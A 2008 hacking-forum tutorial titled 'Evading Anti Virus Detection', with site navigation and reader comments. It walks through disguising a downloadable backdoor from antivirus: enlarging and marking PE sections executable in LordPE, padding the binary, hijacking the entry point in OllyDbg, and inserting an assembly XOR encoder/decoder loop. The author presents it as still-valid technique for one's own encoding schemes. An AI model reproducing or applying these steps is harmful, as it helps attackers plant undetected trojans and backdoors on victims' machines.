* Home <../index.php> * Discussion Forum <../forum/index.php> * Forgotten Password <../lostpassword.php> * Register <../register.php> HellBound Hackers <../index.php> Join us at IRC!

<ircs://storm.psychotik.net::6697/hbh> One mans freedom fighter, another's terrorist. Wednesday, December 21, 2011 Navigation *Home* HellBoundHackers *Main:* * Home / News </> HellBoundHackers *Find:* * Search <../search.php> * Members <../members.php> HellBoundHackers *Information:* * * * * * Development <../development/> Newsletters <../newsletter/> HBH Services <../services.php> Media <../media.php> Info for Schools <../school.php>

HellBoundHackers *Additional:* * * * * * *Shop* * Exclusive Membership <../exclusive/index.php> *Learn* * Articles <../articles/index.php> * Lessons <../lessons.php> * Code Bank <../code/index.php> *Communicate* * Discussion Forum <../forum/index.php> * HBH irc <../IRC/pjirc.php> *Submit* * * * * * Submit Submit Submit Submit Submit News <../submit.php?stype=n> Link <../submit.php?stype=l> Article <../submit.php?stype=a> Code <../code/codesubmit.php> Bug <../bug.php> Userbar <../userbar.php> FAQ <../faq.php> Advertise <../advertise.php> Contact HBH <../contact.php> Disclaimer <../disclaimer.php>

*Challenges* * Rankings <../rank.php> * Challenge Points <../challenges/points.php> HellBoundHackers *Exploit:* * * * * * * * Basic Web Hacking <../challenges/basic.php> Application Cracking <../challenges/app/index.php> Javascript Hacking <../challenges/js/index.php> Realistic Challenges <../challenges/real.php> Rooting Challenges <../challenges/root.php> Flash Challenges <../challenges/flash/index.php> Pen-Testing Challenges <../challenges/pentest/index.php>

HellBoundHackers *Programming:* * Timed Challenges <../challenges/timed/index.php> HellBoundHackers *Think:* * Encryption <../challenges/encryption/index.php> * Logical <../challenges/logic.php> * Stegano <../challenges/stegano/index.php> HellBoundHackers *Track:* * Tracking <../challenges/tracking/index.php> HellBoundHackers *Patch:* * Web Patching <../challenges/patch.php> * App Patching <../challenges/app-patching.php> HellBoundHackers *Other:* * Other Challenges <../challenges/other/index.php> * S. Engineering <../challenges/social-engineering.php> HellBoundHackers *Need Help?* * HBHBot <../challenges/bot/index.php> *Interact* * HBH Podcasts </podcasts.php> * Interview with a Hacker </interview/> *Other* HellBoundHackers *Executive:* * Hall of Fame <../hof.php> * Hall of Generosity <../hog.php> HellBoundHackers *Leisure:* * Urban Defacements <../urban/index.php> * Link to Us <../link.php> Members Online

Total Online: 25 Web Spiders: 6 Guests Online: 18 Members Online: 7 rock4ever56 <../profile/rock4ever56.html>, pangd <../profile/pangd.html>, Jimbojams <../profile/Jimbojams.html>, NopPop <../profile/NopPop.html>, Galligator <../profile/Galligator.html>, cphackz <../profile/cphackz.html>, Evandta <../profile/Evandta.html> Registered Members: 65508 Newest Member: *Jimbojams* Latest Articles Mapping Memory... <http://www.hellboundhackers.org/articles/942-mapping-memory.html > Javascript 16 *may c... <http://www.hellboundhackers.org/articles/941-javascript-16-*may-contain-s poilers*.html > Advanced DLL Injecti... <http://www.hellboundhackers.org/articles/940-advanced-dll-injection-c-c++ .html > Tweaking Firefox Plu... <http://www.hellboundhackers.org/articles/939-tweaking-firefox-plugins-towork-with-newer-versions-of-firefox.html > An Intoduction to Ga... <http://www.hellboundhackers.org/articles/938-an-intoduction-to-game-theor y.html > Positional Number Sy... <http://www.hellboundhackers.org/articles/937-positional-number-systems.ht ml > Dream Interpretation... <http://www.hellboundhackers.org/articles/936-dream-interpretation-psychol ogy.html > Freewebhosts and sub... <http://www.hellboundhackers.org/articles/935-freewebhosts-and-subdomains. html >

The Dunning-Kruger E... <http://www.hellboundhackers.org/articles/934-the-dunning-kruger-effect.ht ml > Me and my router... <http://www.hellboundhackers.org/articles/931-me-and-my-router.html > Hardware Hacking Par... <http://www.hellboundhackers.org/articles/930-hardware-hacking-part-1.html > Encryption 11-The si... <http://www.hellboundhackers.org/articles/928-encryption-11-the-simplest-w ay.html > Realistic 13... <http://www.hellboundhackers.org/articles/927-realistic-13.html > Uniguest bypass... <http://www.hellboundhackers.org/articles/925-uniguest-bypass.html > javascript16... <http://www.hellboundhackers.org/articles/924-javascript16.html >

Evading Anti Virus Detection

FLV Blaster - Download Music and Videos Faster <http://www.pjtra.com/t/4-47220-64501-64472> website security Learn how to hide your trojans, backdoors, etc from anti virus.

Hiding backdoors and trojans from antivirus software --------------------------------------------------------This is a POC on how to evade detection from AV. In this article I will try to guide you through the generic steps needed for this process, and show you by example on a specific back door available. This is a POC and not applicable to modern AV. However, the process for developing your own encoding/decoding scheme, so that this will work, is entirely valid. Programs used http://www.white-scorpion.nl/programs/backdoor.zip -- basic back door

http://www.4shared.com/file/32660382/3562d77f/LordPE.html -- LordPE http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm -- Hex Editor http://www.ollydbg.de/ -- ollydbg General Overview ---------------We are going to start by increasing the file size of our backdoor giving us room of our own to write code in. We will then hijack then entry point of the program, redirect it to our own encoder. This encoder for the POC will XOR the file contents, and then jump back to the original starting place. XOR is a reversible process, so that when saved in this encoded state, the signatures will not match those in the AV database. When ran however, the same XOR loop, will decode the program while in memory where AV does not affect it. Lets get started ---------------Note: Your addresses might not match mine exactly, so look at the general structure and you will be able to follow along. Step - 1 -------Open up backdoor.exe (located in the bin folder) in LordPE. LordPE is a portable executable viewer and editor. -Click on PE editor to open file -Click sections in the new window Here we see 3 sections .text .rdata and .data. For this example we will select .data. Right click and select edit section header. -Add 1000 hex bytes to the virtual size and the raw size. VirtualSize = 00001B4A RawSize = 00001200 -Click on the (...) next to the flags and set 'Executable as code'. This is where we will build our encoder/decoder and thus need to have it executed. -Edit the section header for .text as well to writable (also under flags) -Save and close LordPE Step - 2 -------If you tried to open your backdoor now you will notice an error indicating it is not a valid Win32 Application. This is because our sizes do no balance. We indicated there were an extra 1000 hex bytes, but have not actually added anything to the program. So we will now pad our program. -Open it up in XVI32 (or other hex editor of your choice) -Scroll to the end of the file, and this is where we will add our 1000 hex bytes. -Edit > insert (Select Hex String: 00 Insert <n> times - choose hexadecimal $1000)

This inserts our 1000 bytes needed to write our code in. Now save and close the hex editor. If you were to run the backdoor.exe now, you will notice it does work, but still detected by the antivirus. We have not changed our code, or signature yet. Step - 3 -------Ollydbg: I am going to assume you have a basic understanding of what olly is and how to use a few basic features. --Preparing for our code injection-Open the back door and first look at a few things. -Address of the entry point -Address of our 1000 hex bytes (you can select an address anywhere in this area) Copy the first few lines of the backdoor.exe to clipboard, and keep available in notepad for later reference. Now scroll down to the padded 00 bytes and choose and address where we will inject our encoder. For this example I am going to choose address 00401590. --Altering the code-First thing we will need to do now, is hijack the ModuleEntryPoint and redirect it to our section. JMP 00401590 #This will force the jump from module entry point to our code cave select this line and save the file. Rightclick > copy to executable > selection. Then save file as backdoor_v2.exe. Note if you change the file name from the original like I did, go ahead and close the first and open up the altered one. You will now notice the first two lines of code have changed. 00401000 > $ E9 8B050000 JMP backdoor.00401590 00401005 . 68 34 31 40 00>ASCII "h41@",0 If you step 1 time in this program now you will notice you end on address, 00401590. Now we can begin writing our XOR loop. MOV EAX, 0040100A # Start of encoding address. XOR BYTE PTR DS: [EAX], 5E # XOR the contents of EAX with the key 5E INC EAX # Increase EAX

CMP EAX, 004014EB # Tests to see if we've reached the end of our enc JLE SHORT 00401595 # If not, jump back to XOR command

After this we need to put the code in that we overwrote at the beginning. CALL 00401468 PUSH 00403134 Then we will jump to the address after the push command. At address 0040100A JMP 0040100A At this point we now have the XOR loop written, the following commands, and a return to the beginning. However we are not quite done yet. Save your modifications, and set a break point (f2) after the JLE SHORT command. Now run the program, and it will stop in at the break point, and the program will now be encoded. Highlight the entire program and again save this file (backdoor_v3.exe). The program is now entire encoded except the first few lines, and our code cave. When this is now ran, it will again, jump to our XOR loop, decode itself, and then proceed to function as it was written. This article was written by stdio in reference to a demo preformed by Mati Aharoni (Muts).

security article Posted by stdio <../profile/stdio.html> on July 26 2008 - 12:26:10 6 Comments <comments-842-<!-surphace-title-start-><h1-class="hheader">evading-anti-virus-de tection<-h1><!-surphace-title-end->.html> 8913 Reads Print print this tutorial <print.php?type=A&item_id=842> Comments Uber0n <../profile/Uber0n.html> on July 27 2008 - 09:58:10 Really interesting and very well written. I'm impressed B) korg <../profile/korg.html> on August 19 2008 - 08:15:29 Nice job. I have read most of Mati's articles I have found, He has some interesting topics. Zephyr_Pure <../profile/Zephyr_Pure.html> on August 29 2008 - 04:17:11 It's very rare that I say this... but, that was a damn good article. Showed a great deal of technique and knowledge, while keeping it simple. stdio <../profile/stdio.html> on August 29 2008 - 17:54:11 Thanks for all the kind replies. However I did manage to stumble across a more detailed paper describing the same process written after mine. Here's the link if interested: http://www.milw0rm.com/papers/217 sam207 <../profile/sam207.html> on October 17 2008 - 07:07:53 very nice one... Thanks a lot for this one.. hellboundhackersok <../profile/hellboundhackersok.html> on November 08 2008 - 21:28:57 The backdoor program makes McAfee SiteAdvisor turn red. nice job. ahahah

Post Comment *Sorry.* You must have completed the challenge *Basic 1* and have *100 points* or more, to be able to post. Ratings Rating is available to members only. Please login or register to vote. -----------------------------------------------------------------------Awesome! 100% [8 Votes] Very Good 0% [No Votes] Good 0% [No Votes] Average 0% [No Votes] Poor 0% [No Votes] Guest Username Password Remember Me

Bullet Register <../register.php> Bullet Lost Password? <../lostpassword.php> Bookmark This Page <#> <#> <http://www.addthis.com/bookmark.php?v=250&winname=addthis&pub=xa-4d1c74a20ec09b 5a&source=tbx32-250&lng=en-US&s=stumbleupon&url=http%3A%2F%2Fwww.hellboundhacker s.org%2Farticles%2F842-evading-anti-virus-detection.html&title=Evading%20Anti%20 Virus%20Detection%20Article%20at%20HellBound%20Hackers&ate=AT-xa-4d1c74a20ec09b5 a/-/-/4ef173418474a4b5/1&frommenu=1&uid=4ef17341cb730ad0&ct=1&pre=http%3A%2F%2Fw ww.google.com%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3Dlord%2520pe%2520virus%26source%3Dwe b%26cd%3D2%26ved%3D0CCQQFjAB%26url%3Dhttp%253A%252F%252Fwww.hellboundhackers.org %252Farticles%252F842-evading-anti-virus-detection.html%26ei%3DzwHyTtPyGcHirAe3h 5XgDw%26usg%3DAFQjCNGB6Et_xzUZMcE5yvoNwm_40C7HpA%26cad%3Drja&tt=0> <#> Affiliates PHP-Fusion <http://www.php-fusion.co.uk> HackThisSite <http://www.hackthissite.org/> Elites0ft <http://elites0ft.com/> psych0tik.blog <http://blog.psych0tik.net/> Valhalla <http://halls-of-valhalla.dyndns.org> Adverts

<http://peerfly.com/x/13459/1426/36556/>

160 x 600 <http://www.pntrs.com/t/4-47360-64501-66731> Links

Anime Wallpaper Site <http://www.ipicstorage.com/> By using, viewing or obtaining any information contained on this site, you agree to the disclaimer <../disclaimer.php>. HellBound Hackers 2008- 2009. Since 3rd December 2004. 19231550 Unique Visits Powered by HBH-Fusion